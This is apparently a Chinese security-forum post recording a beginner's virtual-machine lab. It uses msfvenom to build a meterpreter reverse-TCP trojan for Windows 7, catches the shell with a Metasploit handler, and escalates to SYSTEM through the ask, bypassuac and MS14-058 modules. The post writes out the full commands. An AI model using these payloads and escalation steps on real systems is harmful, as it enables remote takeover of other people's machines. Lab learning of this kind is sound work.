用户
搜索
  • TA的每日心情
    郁闷
    2020-2-3 09:35
  • 签到天数: 3 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋-脚本小子

    Rank: 2

    4

    主题

    28

    帖子

    220

    魔法币
    收听
    1
    粉丝
    0
    注册时间
    2018-7-30
    发表于 2020-11-1 23:32:18 24935
    本帖最后由 J1Z0n 于 2020-11-2 22:07 编辑

    1.
    刚和对象分手,吃完一碗泡面,就来和各位表哥们吹牛皮了,因为表哥们比对象重要哈哈哈哈;
    别喷弟弟,由于实验实在本地进行,所以需要各位看官搭建环境
    2.
    实验材料|:
                    1.win7x64虚拟机一台
                    2.kali一台
                    3.接下来全靠吹牛皮
    3.
      在我们拿到一个低权限的shell之后,我们需要提权,所以此篇文章就是针对这种情况的,屁话不多,搭建好两台虚拟机之后就可以开始了
    3.1直接提权
    我们首先需要制作一个马,先查看kali的ip,我这里是192.168.199.129,
    kalipi.png
    使用msfVENOM制作一个马,使用刚刚得到的ip,输入命令,
    msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp lhost=192.168.199.129 lport=4444 -f exe x> shell.exe  
    我解读一下,使用msfvenom,制作x64位的win木马,使用windows/x64/meterpreter_reverse_tcp模块,监听主机为192.168.199.129,监听端口为4444.输出格式为exe可执行文件,输出名字为shell.exe,各位表哥看着输入命令
    可以看到木马制作成功,接下来就是发送给靶机运行即可
    QQ截图20201101223444.png
    注:
    msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线4.

    使用msfcosole,命令
    use exploit/multi/handler
    set payload windows/x64/meterpreter_reverse_tcp
    set lhost 192.168.199.129
    set lport 4444
    exploit

    QQ截图20201101224333.png
    可以看到成功监听。接下来靶机运行之前生成的木马即可拿到shell
    shell.png
    已经可以看到sessions了,成功拿到shell,但是此时我们仅仅只是一个管理员权限,我们当然需要system权限
    sessions9.png 3.1.1
    此时进入我们的exploit/windows/local/ask来提权,
    输入命令use exploit/windows/local/ask进入该模块,此时只有一个sessions id为1
    session4.png
    使用命令 set session 1
    set filename QQ.exe
    exploit
    (此时uac会在win7弹出一个窗口,我们选择是)
    7.png
    即可看到成功获取system,此时我们进入shell,输入whoami,成功拿到system权限,这种提权方式是提高程序运行级别来提高权限
    system.png shell.png
    注意:以上过程需要kali和win7处在同一个局域网中,如果不在一个局域网,就需要内网穿透(内网穿透简单来说就是将内网外网通过natapp隧道打通,让内网的数据让外网可以获取
    3.1.2
    绕过uac提权
    我们需要使用use exploit/windows/local/bypassuac模块来绕过uac策略


    使用background返回到msf
    命令:background
              use exploit/windows/local/bypassuac
              sessions
              set session 6
              exploit即可成功
    提权.png
    输入sessions即可看到重新生成了许多session,此时我们只需要选择一个session进入会话getsystem即可
    sessions3.png system.png
    这种提权方法比第一种更好,没有与用户交互的过程,当用户有一定安全基础时第一种方法可能会失效
    3.1.3
    使用提权漏洞进行提权,先讲之前的session全部清空,留下一个admin权限的session
    session1.png
    因为windows本地提权漏洞挺多的,所以我选择一个来举例子,其实都可以去试一下
    首先进入exploit/windows/local/ms14_058_track_popup_menu模块
    输入命令set session 1
                 exploit
    即可执行,直接获取system的session
    4.
    本人也是菜鸟一只,只是记录一下自己的学习过程,讲了拿到了一个简单shell之后如何反弹到本地并成功提权的过程,希望表哥们不要喷我,也可以和弟弟一起交流一下,弟弟qq1852965621
    就冲这个开头,顶你!
    使用道具 举报 回复
    发表于 2020-11-9 00:16:00
    ttttttqqqqqqqllllllll,j1表哥yyds!!!!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册